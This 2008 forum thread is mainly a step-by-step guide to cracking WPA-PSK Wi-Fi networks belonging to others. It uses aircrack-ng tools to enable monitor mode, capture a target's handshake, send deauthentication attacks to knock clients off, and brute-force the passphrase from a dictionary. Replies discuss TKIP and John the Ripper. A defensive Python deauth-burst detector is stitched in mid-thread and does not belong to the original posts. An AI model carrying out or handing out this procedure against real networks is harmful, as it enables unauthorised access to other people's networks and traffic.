WPA CRACKING


Post by riley2458 on Sat Nov 22, 2008 5:50 pm

How To Crack Wireless Networks WPA psk/psk2

Requirements

Linux OS ( almost any will work )
Aircrack-Ng Suite
Madwifi Driver ** search on google **
A Good Dictionary file

** If using BackTrack or another live CD, these things are probably already built in.


STARTING:

Alright, before doing any of this, make sure your network card is compatible with aircrack & madwifi! Some cards don't wake up after you put them in monitor mode.
OK, log in as root and go to a terminal.

Code:
[root@localhost ~]# airmon-ng


Interface   Chipset      Driver

wifi0      Atheros      madwifi-ng
ath0      Atheros      madwifi-ng VAP (parent: wifi0)


Now just put your card in monitor mode

Code:
[root@localhost ~]# airmon-ng stop ath0


Interface   Chipset      Driver

wifi0      Atheros      madwifi-ng
ath0      Atheros      madwifi-ng VAP (parent: wifi0)

[root@localhost ~]# airmon-ng start wifi0


Interface   Chipset      Driver

wifi0      Atheros      madwifi-ng
ath0      Atheros      madwifi-ng VAP (monitor mode enabled)


Now just
type: ifconfig ath0 up
type: iwconfig

Code:
[root@localhost ~]# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wifi0     no wireless extensions.

pan0      no wireless extensions.

ath0      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.437 GHz  Access Point: **:**:**:**:**:**
          Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=1/1 
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/70  Signal level=-93 dBm  Noise level=-93 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0



CAPTURING:

OK, now you have to start capturing your target's network, so first open a new terminal window.
Code:
airodump-ng ath0


This shows all the networks you can capture in your area. Find the network you want to crack that is WPA protected, and copy the BSSID (MAC address).

**DIRECTIONS**

airodump-ng:

-c The channel that your target is on
example: airodump-ng -c 6

-w The name you want to save the capture as
example: airodump-ng -c 6 -w wpapsk
example2: /root/wpapsk-01.cap

--bssid The BSSID that you want to capture (the one you copied)
example: airodump-ng -c 6 -w wpapsk --bssid **:**:**:**:**:**

ath0 The interface you are using
example: airodump-ng -c 6 -w wpapsk --bssid **:**:**:**:**:** ath0

**END OF DIRECTIONS**

Alright, now type: airodump-ng -c XX -w whateveruwant --bssid **:**:**:**:**:** ath0

Code:
CH  6 ][ Elapsed: 2 mins ][ 2008-11-23 3:51     

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

**:**:**:**:**:**   12 100     2495        7    0   6  54  WPA  TKIP   PSK   BOBNET

BSSID              STATION            PWR   Rate  Lost  Packets  Probes 


NOW WAIT until a client connects to the network.

AIREPLAY:

Next you're going to use aireplay to send attacks.

**DIRECTIONS**

aireplay-ng

xx = mine
** = target's

-0 5 This sends 5 attacks to the target
example: aireplay-ng -0 5

-a The target wireless network's BSSID
example: aireplay-ng -0 5 -a **:**:**:**:**:**

-c Your access point BSSID (remember the iwconfig that I told you to leave open)
example: aireplay-ng -0 5 -a **:**:**:**:**:** -c xx:xx:xx:xx:xx:xx

ath0 The interface, and you're ready to go!
example:
Code:
aireplay-ng -0 5 -a **:**:**:**:**:** -c xx:xx:xx:xx:xx:xx ath0


** END OF DIRECTIONS **

CRACKING:

When your airodump finally shows this:

Code:
CH  6 ][ Elapsed: 2 mins ][ 2008-11-23 3:51 [WPA HANDSHAKE FOUND]

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

**:**:**:**:**:**   12 100     2495        7    0   6  54  WPA  TKIP   PSK   ************

BSSID              STATION            PWR   Rate  Lost  Packets  Probes

Then you can crack their network!

FIRST YOU NEED A DICTIONARY FILE
Make sure you know the directory it's in.

**DIRECTIONS**

aircrack-ng

[the directory not a command]
example: aircrack-ng /root/w.ethenamewas-01.cap

-w The dictionary file (the whole directory), and then run the command!!
Code:
[root@localhost ~]# aircrack-ng /root/w.ethenamewas-01.cap -w /usr/share/dict/linux.words


**END OF DIRECTIONS**

Once you run the command, it should start cracking...

Code:
  Aircrack-ng 1.0 rc1


                   [00:00:02] 622 keys tested (303.68 k/s)


                       Current passphrase: abscision                 


      Master Key     : 38 1A FF 6F C1 D1 B5 EE D5 73 FC A7 48 54 4E 1E
                       2E A8 A1 55 BD E2 2E 36 63 49 C0 96 DF CA 7E 5A

      Transcient Key : 6F A6 0D 93 46 F9 A2 6B AB 31 96 31 F9 C6 5F 51
                       83 91 86 59 30 A0 DB 95 43 5F D4 72 BA 5D BD B1
                       51 98 06 9B 7D E8 DD 4D AA 37 B3 E6 1F DF 1F 50
                       71 35 B9 2F 33 6F 89 1B E2 13 89 74 E5 E6 16 17

      EAPOL HMAC     : 68 B3 E9 AB 56 01 6C D8 A6 BE 4D B6 C2 0C 9D D0




THIS WILL ONLY WORK IF THE PASSWORD IS SOMEWHERE IN YOUR DICTIONARY!!



** This concludes my guide to cracking wireless networks!!

Any problems just PM or comment.
riley2458
Posts: 1
Joined: Sat Nov 22, 2008 5:23 pm
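From the defender's side, the aireplay-ng -0 step above is a burst of deauthentication frames, which is something a wireless IDS can spot. As an added example (not from the original post), here is a small Python parser for 802.11 management frame headers with a sliding-window counter that flags a BSSID once several deauth frames arrive within a short interval; the frames, MAC addresses, window and threshold are all constructed values for the demo.

```python
import struct
from collections import defaultdict, deque

DEAUTH = 12  # 802.11 management frame subtype: Deauthentication

def mac_bytes(mac):
    return bytes.fromhex(mac.replace(':', ''))

def build_mgmt_frame(subtype, addr1, addr2, bssid, reason=None):
    """Constructed test frame: frame control, duration, addr1-3, seq ctrl, optional reason code."""
    fc = bytes([subtype << 4, 0x00])  # type 0 (management) in bits 2-3, subtype in bits 4-7
    hdr = fc + b'\x00\x00' + mac_bytes(addr1) + mac_bytes(addr2) + mac_bytes(bssid) + b'\x00\x00'
    body = struct.pack('<H', reason) if reason is not None else b''
    return hdr + body

def parse_mgmt_frame(frame):
    """Return (subtype, addr1, addr2, bssid, reason) or None if not a management frame."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 0:
        return None
    subtype = (frame[0] >> 4) & 0xF
    addr1, addr2, bssid = (frame[i:i + 6].hex(':') for i in (4, 10, 16))
    reason = None
    if subtype == DEAUTH and len(frame) >= 26:
        reason = struct.unpack_from('<H', frame, 24)[0]  # reason code follows the 24-byte header
    return subtype, addr1, addr2, bssid, reason

def detect_deauth_bursts(frames, window=2.0, threshold=4):
    """frames: iterable of (timestamp, raw_frame). Alert when >= threshold deauths
    target one BSSID within `window` seconds; the counter resets after each alert."""
    recent = defaultdict(deque)
    alerts = []
    for ts, raw in frames:
        parsed = parse_mgmt_frame(raw)
        if parsed is None or parsed[0] != DEAUTH:
            continue  # beacons, probes, data frames: not of interest here
        _, addr1, addr2, bssid, reason = parsed
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            alerts.append((bssid, ts, len(q), reason))
            q.clear()
    return alerts

AP, CLIENT, BCAST = 'aa:bb:cc:dd:ee:01', '11:22:33:44:55:66', 'ff:ff:ff:ff:ff:ff'  # constructed

def sample_capture():
    """Constructed traffic: a beacon, one benign client deauth, then five spoofed broadcast deauths."""
    frames = [(9.0, build_mgmt_frame(8, BCAST, AP, AP)),                   # beacon, subtype 8
              (9.5, build_mgmt_frame(DEAUTH, AP, CLIENT, AP, reason=3))]  # client leaving
    for ts in (10.0, 10.1, 10.2, 10.3, 10.4):
        frames.append((ts, build_mgmt_frame(DEAUTH, BCAST, AP, AP, reason=7)))
    return frames

if __name__ == '__main__':
    for bssid, ts, n, reason in detect_deauth_bursts(sample_capture()):
        print(f'deauth burst: {n} frames against BSSID {bssid} at t={ts}s (reason code {reason})')
```

A single deauth from a client that is genuinely leaving stays below the threshold; it takes a run of them within the window to raise the alert.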


Re: WPA CRACKING

Post by AgentSmithers on Thu Feb 12, 2009 4:09 pm

Yeah, I've got these steps in my head. I use the AWUS036H network adapter with BackTrack... What about TKIP? Is the only public method known brute force?? Or am I wrong?


Scratch that, let me specify more. With WEP we can do packet injection, then brute force. I don't believe there is such a method of packet injection for WPA, just putting your card into monitor mode, then a dictionary attack... Right?
Http://ControllingTheInter.Net
My General Computer Forum, From Security To Programming And Back To Troubleshooting.
AgentSmithers
Posts: 21
Joined: Thu Feb 12, 2009 12:27 pm
Location: Palm Springs


Re: WPA CRACKING

Post by noOneSpecial on Wed May 06, 2009 1:05 pm

As far as I know, you can only attack WPA via a brute-force dictionary attack :) You could try John the Ripper in --incremental mode and pipe it to aircrack... but there is a problem: John can generate only words of up to 8 characters... and as we know, a WPA passphrase starts from 8 digits... So it would be nice for John to allow more than 8 digits in incremental mode....
noOneSpecial
Posts: 25
Joined: Wed May 06, 2009 10:15 am


